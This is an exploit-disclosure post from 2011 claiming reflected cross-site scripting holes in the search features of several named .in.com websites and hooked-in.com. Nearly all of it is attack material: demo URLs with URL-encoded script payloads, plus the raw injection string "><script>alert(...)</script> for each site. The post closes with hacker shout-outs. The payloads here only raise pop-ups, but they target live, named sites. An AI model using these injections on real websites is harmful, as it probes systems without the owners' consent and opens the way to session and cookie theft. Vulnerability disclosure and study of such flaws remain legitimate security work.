# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: https://shadowrootkit.wordpress.com/
# Google Dork:   © Copyright 2010, Business.in.com
************************************************************

{DEMO} :
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/r007k17/)</script>

 Reflected XSS in  connect.in.com
 Inject EXPLOIT below in search field in http://connect.in.com
observe a pop-up saying r007k17

{DEMO} :   http://connect.in.com

EXPLOIT: "><script>alert(/r007k17/)</script>

************************************************************
 sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
Advertisements